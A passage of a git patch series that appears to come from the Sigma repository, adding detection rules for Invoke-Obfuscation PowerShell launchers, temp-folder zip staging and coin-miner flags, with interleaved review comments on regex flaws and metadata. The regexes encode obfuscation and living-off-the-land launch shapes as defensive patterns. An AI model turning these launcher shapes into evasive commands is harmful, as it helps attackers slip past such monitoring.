rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml new file mode 100644 index 00000000..3d0f3df1 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml @@ -0,0 +1,26 @@ +title: Invoke-Obfuscation CLIP+ Launcher +id: 73e67340-0d25-11eb-adc1-0242ac120002 +description: Detects Obfuscated use of Clip.exe to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/13 +modified: 2021/10/07 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_4104: + EventID: 4104 + ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + condition: selection_4104 +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml new file mode 100644 index 00000000..3e4126e7 --- /dev/null 
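Review bot: The `ScriptBlockText|re` pattern in the new CLIP+ rule has no `(?i)` flag, so `cmd`, `clip` and `clipboard` must appear in lower case, whereas the via_compress, via_rundll and via_use_* rules added by the same commit all begin with `(?i)`. To my knowledge Invoke-Obfuscation launchers randomise token case, so a case-sensitive match is likely to miss real samples; prefix the pattern with `(?i)`. The leading `.*` is redundant for an unanchored search and can be dropped at the same time.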
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml @@ -0,0 +1,32 @@ +title: Invoke-Obfuscation Obfuscated IEX Invocation +id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 +description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" +status: experimental +author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community +date: 2019/11/08 +modified: 2021/10/07 +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled +detection: + selection_1: + EventID: 4104 + selection_2: + - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' + - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' + - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' + - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' + - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' + - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' + - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' + condition: selection_1 and selection_2 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml new file mode 100644 index 00000000..2cb8ef01 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml 
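Review bot: In `selection_2` the last pattern `'\String\]\s*\$VerbosePreference'` begins with `\S`, which in PCRE-style regex means "any non-whitespace character" rather than a literal backslash-S, so the pattern matches text like `xtring]` and never the intended `[String]` cast; it should probably read `'\[String\]\s*\$VerbosePreference'`. Similarly `'\\\\*mdr\\\\*\W\s*\)\.Name'` requires literal backslashes on both sides of `mdr`, while the obfuscated code this targets would use a wildcard string such as `'*mdr*'`; verify against a sample, since `'\*mdr\*\W\s*\)\.Name'` looks like the intent. The same patterns are kept as context in the module-logging copy of this rule, so both files need the fix.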
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation STDIN+ Launcher
+id: 779c8c12-0eb1-11eb-adc1-0242ac120002
+description: Detects Obfuscated use of stdin to execute PowerShell
+status: experimental
+author: Jonathan Cheong, oscd.community
+date: 2020/10/15
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"'
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml
new file mode 100644
index 00000000..c0460b5f
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation VAR+ Launcher
+id: 0adfbc14-0ed1-11eb-adc1-0242ac120002
+description: Detects Obfuscated use of Environment Variables to execute PowerShell
+status: experimental
+author: Jonathan Cheong, oscd.community
+date: 2020/10/15
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"'
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: high
\ No newline at end of file
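Review bot: In the VAR+ launcher regex the empty alternation `(?:\s|)` is the idiom-free spelling of `\s?`, and `(?:\{\d\}){1,}` is just `(?:\{\d\})+`; rewritten, the middle of the pattern reads `(?:\/c|\/r)\s?\"set\s[a-zA-Z]{3,6}.*(?:\{\d\})+\\\"\s+?\-f`. Both the STDIN+ and VAR+ rules share the case-sensitivity and leading-`.*` points raised on the CLIP+ rule above, and both files end without a trailing newline while the IEX and RUNDLL rules in the same commit have one.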
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml
new file mode 100644
index 00000000..3151cae7
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation COMPRESS OBFUSCATION
+id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07
+description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
+status: experimental
+author: Timur Zinniatullin, oscd.community
+date: 2020/10/18
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend'
+ condition: selection_4104
+falsepositives:
+ - unknown
+level: medium
\ No newline at end of file
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml
new file mode 100644
index 00000000..b17ab890
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml
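Review bot: `falsepositives: - unknown` is lower-case here while every other rule in this commit writes `Unknown`; normalize it. The description `Detects Obfuscated Powershell via COMPRESS OBFUSCATION` only restates the title, not what the regex actually looks for; something like `Detects PowerShell that wraps a DeflateStream or StreamReader around ASCII-encoded text and calls ReadToEnd, the shape produced by Invoke-Obfuscation's COMPRESS option` tells an analyst what the alert means. The file also lacks a trailing newline.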
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation RUNDLL LAUNCHER
+id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0
+description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
+status: experimental
+author: Timur Zinniatullin, oscd.community
+date: 2020/10/18
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"'
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: medium
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml
new file mode 100644
index 00000000..c2b5f127
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation Via Stdin
+id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7
+description: Detects Obfuscated Powershell via Stdin in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2020/10/12
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task28)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"'
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: high
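Review bot: `Invoke-Obfuscation Via Stdin` (86b896ba-ffa1-4fea-83e3-ee28a4c915c7) and the STDIN+ launcher rule added earlier in this commit (779c8c12-0eb1-11eb-adc1-0242ac120002) look for the same launcher with different regexes, yet neither mentions the other; a `related:` block with `- id: <the other rule's id>` and `type: similar` is where Sigma records that, and the same applies to the via_use_clip/CLIP+ and via_use_rundll32/RUNDLL pairs. In the via_stdin regex the groups `(set)` and `(environment|invoke|\${?input)` capture for no reason — `(?:...)` is the non-capturing form the RUNDLL rule already uses. In the RUNDLL regex `(?:\s+)?` is simply `\s*`.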
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml
new file mode 100644
index 00000000..9205a254
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation Via Use Clip
+id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0
+description: Detects Obfuscated Powershell via use Clip.exe in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2020/10/09
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task29)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*'
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: high
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml
new file mode 100644
index 00000000..d6455878
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml
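Review bot: The use_clip regex matches `echo`, `clip` and `&&` as bare substrings anywhere in the script block, so a block that mentions `eclipse` or `clipboard` after an `echo` already satisfies the first three terms; anchoring the binary, e.g. `echo.*\bclip(?:\.exe)?\b.*&&`, narrows it without losing the Invoke-Obfuscation launcher shape. The leading `.*?` and trailing `.*` are redundant in an unanchored search, and `(Clipboard|...)` should be `(?:Clipboard|...)`. Given how loose the terms are, `falsepositives: - Unknown` undersells it — scripts that pipe output to clip.exe are a predictable source and worth naming for triage.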
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation Via Use MSHTA
+id: e55a5195-4724-480e-a77e-3ebe64bd3759
+description: Detects Obfuscated Powershell via use MSHTA in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2020/10/08
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task31)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"'
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: high
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml
new file mode 100644
index 00000000..516fc3fc
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation Via Use Rundll32
+id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b
+description: Detects Obfuscated Powershell via use Rundll32 in Scripts
+status: experimental
+author: Nikita Nazarov, oscd.community
+date: 2019/10/08
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"'
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: high
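Review bot: The new file is named `powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml` while its title and regex say MSHTA; `mhsta` looks like a transposition and should be `mshta` so the file sorts next to its module-logging sibling and is found by name. In the MSHTA regex every group — `(set)`, `(&&)`, `(mshta)`, `(vbscript:createobject)`, `(\.run)` — wraps a single literal and captures nothing useful; the parentheses can simply go. The rundll32 rule's `date: 2019/10/08` is a year earlier than the rest of this oscd.community batch (2020/10), which may be a typo, and its references entry is the only one in the set without a task-number comment.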
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml
new file mode 100644
index 00000000..cec226f8
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml
@@ -0,0 +1,26 @@
+title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
+id: e54f5149-6ba3-49cf-b153-070d24679126
+description: Detects Obfuscated Powershell via VAR++ LAUNCHER
+status: experimental
+author: Timur Zinniatullin, oscd.community
+date: 2020/10/13
+modified: 2021/10/07
+references:
+ - https://github.com/Neo23x0/sigma/issues/1009 #(Task27)
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+ - attack.execution
+ - attack.t1059.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script block logging must be enabled
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: high
diff --git a/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml
new file mode 100644
index 00000000..1073d0a1
--- /dev/null
+++ b/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml
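Review bot: The trailing YAML comment `# FPs with |\/r` records why the `/r` alternative was left out of this regex, but the VAR+ launcher rule earlier in this commit still matches `(?:\/c|\/r)`; if `/r` is a known false-positive source the two rules should agree, or that rule's `falsepositives` list should say what `/r` collides with. `(\{\d\}){2,}` captures needlessly; `(?:\{\d\}){2,}` reads the same. As in the other `(?i)` rules here, the `.*` right after the flag is redundant in an unanchored search.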
@@ -0,0 +1,28 @@
+title: Zip A Folder With PowerShell For Staging In Temp
+id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9
+status: experimental
+author: frack113
+date: 2021/07/20
+modified: 2021/10/09
+description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md
+tags:
+ - attack.collection
+ - attack.t1074.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Script Block Logging must be enable
+detection:
+ selection_4104:
+ EventID: 4104
+ ScriptBlockText|contains|all:
+ - 'Compress-Archive '
+ - ' -Path '
+ - ' -DestinationPath '
+ - '$env:TEMP\'
+ condition: selection_4104
+falsepositives:
+ - Unknown
+level: medium
From 41d098b253859826b007edf7940b2f2127778723 Mon Sep 17 00:00:00 2001
From: frack113
Date: Sat, 9 Oct 2021 09:59:21 +0200
Subject: [PATCH 1191/1367] fix yml error
---
 .../powershell_module/powershell_invoke_obfuscation_clip.yml | 2 +-
 .../powershell_invoke_obfuscation_via_stdin.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml
index a203d470..604505ae 100644
--- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml
+++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml
@@ -1,6 +1,6 @@
 title: Invoke-Obfuscation CLIP+ Launcher
 id: a136cde0-61ad-4a61-9b82-8dc490e60dd2
-related :
+related:
 - id: 73e67340-0d25-11eb-adc1-0242ac120002
 type: derived
 description: Detects Obfuscated use of Clip.exe to execute PowerShell
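Review bot: `definition: Script Block Logging must be enable` should read `enabled`, matching the `Script block logging must be enabled` wording of the other rules in this commit. The `contains|all` list requires the spelled-out parameter names ` -Path ` and ` -DestinationPath `, so Compress-Archive calls that pass them positionally are outside the rule's coverage; that limit belongs in the description so an analyst does not read a non-match as absence of activity. `falsepositives: - Unknown` is also thin for this pattern — backup and log-collection scripts that archive into `$env:TEMP` are a predictable benign source worth listing.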
diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml
index 15c1e5cd..65fff0f1 100644
--- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml
+++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml
@@ -19,7 +19,7 @@ logsource:
 service: powershell
 definition: Module Logging must be enable
 detection:
- selection_4103:
+ selection_4103:
 EventID: 4103
 Payload|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"'
 condition: selection_4103
From 77749510b72ff2c3fb9f2f4d3b3879b55f6d5c74 Mon Sep 17 00:00:00 2001
From: frack113
Date: Sat, 9 Oct 2021 10:01:40 +0200
Subject: [PATCH 1192/1367] fix yml
---
 ...ell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml
index 3e4126e7..687ea802 100644
--- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml
+++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml
@@ -26,7 +26,7 @@ detection:
 - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name'
 - ScriptBlockText|re: '\$VerbosePreference\.ToString\('
 - ScriptBlockText|re: '\String\]\s*\$VerbosePreference'
- condition: selection_1 and selection_2
+ condition: selection_1 and selection_2
 falsepositives:
 - Unknown
 level: high
From 6c4e24d0de62927bd72d776396ef299409997937 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Sat, 9 Oct 2021 10:28:16 +0200
Subject: [PATCH 1193/1367] rule: coin miner param --cpu-priority
---
 rules/linux/auditd/lnx_auditd_coinminer.yml | 33 +++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 rules/linux/auditd/lnx_auditd_coinminer.yml
diff --git a/rules/linux/auditd/lnx_auditd_coinminer.yml b/rules/linux/auditd/lnx_auditd_coinminer.yml
new file mode 100644
index 00000000..8a311ec4
--- /dev/null
+++ b/rules/linux/auditd/lnx_auditd_coinminer.yml
@@ -0,0 +1,33 @@
+title: Possible Coin Miner CPU Priority Param
+id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed
+status: experimental
+description: Detects command line parameter very often used with coin miners
+author: Florian Roth
+date: 2021/10/09
+references:
+ - https://xmrig.com/docs/miner/command-line-options
+tags:
+ - attack.privilege_escalation
+ - attack.t1068
+logsource:
+ product: linux
+ service: auditd
+detection:
+ cmd1:
+ a1|startswith: '--cpu-priority'
+ cmd2:
+ a2|startswith: '--cpu-priority'
+ cmd3:
+ a3|startswith: '--cpu-priority'
+ cmd4:
+ a4|startswith: '--cpu-priority'
+ cmd5:
+ a5|startswith: '--cpu-priority'
+ cmd6:
+ a6|startswith: '--cpu-priority'
+ cmd7:
+ a7|startswith: '--cpu-priority'
+ condition: 1 of them
+falsepositives:
+ - Other tools that use a --cpu-priority flag
+level: critical
\ No newline at end of file
From 5c68c42058b88bb830af394a4c2bd2ff99aa28b8 Mon Sep 17 00:00:00 2001
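Review bot: The tags `attack.privilege_escalation` and `attack.t1068` do not describe what this rule observes: T1068 is Exploitation for Privilege Escalation, whereas a miner's `--cpu-priority` flag is evidence of resource hijacking, which ATT&CK files under Impact as T1496, so `attack.impact` / `attack.t1496` are the tags analysts will pivot on. `level: critical` also sits uneasily next to a title that says "Possible" and a falsepositives entry admitting other tools use the flag; `high` is the customary level for a single-indicator rule. If the auditd field mapping populates `a1`..`a7` on record types other than EXECVE, each selection may also want a `type: EXECVE` constraint as other auditd rules in the repository appear to use — I cannot confirm that from this hunk. The file lacks a trailing newline.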
From: frack113
Date: Sat, 9 Oct 2021 10:30:36 +0200
Subject: [PATCH 1194/1367] order powershell_script
---
 .../powershell_module/powershell_invoke_obfuscation_var.yml | 1 +
 .../powershell_module/powershell_susp_zip_compress.yml | 2 +-
 .../{ => powershell_script}/powershell_adrecon_execution.yml | 0
 .../{ => powershell_script}/powershell_automated_collection.yml | 0
 .../powershell_cl_invocation_lolscript.yml | 0
 .../powershell_cl_invocation_lolscript_count.yml | 0
 .../powershell_cl_mutexverifiers_lolscript.yml | 0
 .../powershell_cl_mutexverifiers_lolscript_count.yml | 0
 .../{ => powershell_script}/powershell_create_local_user.yml | 0
 .../{ => powershell_script}/powershell_data_compressed.yml | 0
 .../{ => powershell_script}/powershell_detect_vm_env.yml | 0
 .../{ => powershell_script}/powershell_dnscat_execution.yml | 0
 .../{ => powershell_script}/powershell_icmp_exfiltration.yml | 0
 .../{ => powershell_script}/powershell_invoke_nightmare.yml | 0
 .../{ => powershell_script}/powershell_keylogging.yml | 0
 .../powershell_malicious_commandlets.yml | 0
 .../{ => powershell_script}/powershell_malicious_keywords.yml | 0
 .../powershell_memorydump_getstoragediagnosticinfo.yml | 0
 .../powershell_nishang_malicious_commandlets.yml | 0
 .../{ => powershell_script}/powershell_ntfs_ads_access.yml | 0
 .../powershell_powerview_malicious_commandlets.yml | 0
 .../{ => powershell_script}/powershell_prompt_credentials.yml | 0
 .../powershell/{ => powershell_script}/powershell_psattack.yml | 0
 .../{ => powershell_script}/powershell_shellcode_b64.yml | 0
 .../powershell_shellintel_malicious_commandlets.yml | 0
 .../powershell_store_file_in_alternate_data_stream.yml | 0
 .../powershell_suspicious_export_pfxcertificate.yml | 0
 .../powershell_suspicious_getprocess_lsass.yml | 0
 .../{ => powershell_script}/powershell_suspicious_keywords.yml | 0
 .../powershell_suspicious_mail_acces.yml | 0
 .../powershell_suspicious_mounted_share_deletion.yml | 0
 .../{ =>
powershell_script}/powershell_suspicious_recon.yml | 0
 .../powershell_suspicious_win32_pnpentity.yml | 0
 .../powershell/{ => powershell_script}/powershell_timestomp.yml | 0
 .../{ => powershell_script}/powershell_trigger_profiles.yml | 0
 .../{ => powershell_script}/powershell_web_request.yml | 0
 .../{ => powershell_script}/powershell_winlogon_helper_dll.yml | 0
 .../{ => powershell_script}/powershell_wmi_persistence.yml | 0
 .../powershell/{ => powershell_script}/powershell_wmimplant.yml | 0
 39 files changed, 2 insertions(+), 1 deletion(-)
 rename rules/windows/powershell/{ => powershell_script}/powershell_adrecon_execution.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_automated_collection.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_cl_invocation_lolscript.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_cl_invocation_lolscript_count.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_cl_mutexverifiers_lolscript.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_cl_mutexverifiers_lolscript_count.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_create_local_user.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_data_compressed.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_detect_vm_env.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_dnscat_execution.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_icmp_exfiltration.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_invoke_nightmare.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_keylogging.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_malicious_commandlets.yml (100%)
 rename rules/windows/powershell/{ =>
powershell_script}/powershell_malicious_keywords.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_memorydump_getstoragediagnosticinfo.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_nishang_malicious_commandlets.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_ntfs_ads_access.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_powerview_malicious_commandlets.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_prompt_credentials.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_psattack.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_shellcode_b64.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_shellintel_malicious_commandlets.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_store_file_in_alternate_data_stream.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_export_pfxcertificate.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_getprocess_lsass.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_keywords.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_mail_acces.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_mounted_share_deletion.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_recon.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_win32_pnpentity.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_timestomp.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_trigger_profiles.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_web_request.yml (100%)
 rename
rules/windows/powershell/{ => powershell_script}/powershell_winlogon_helper_dll.yml (100%)
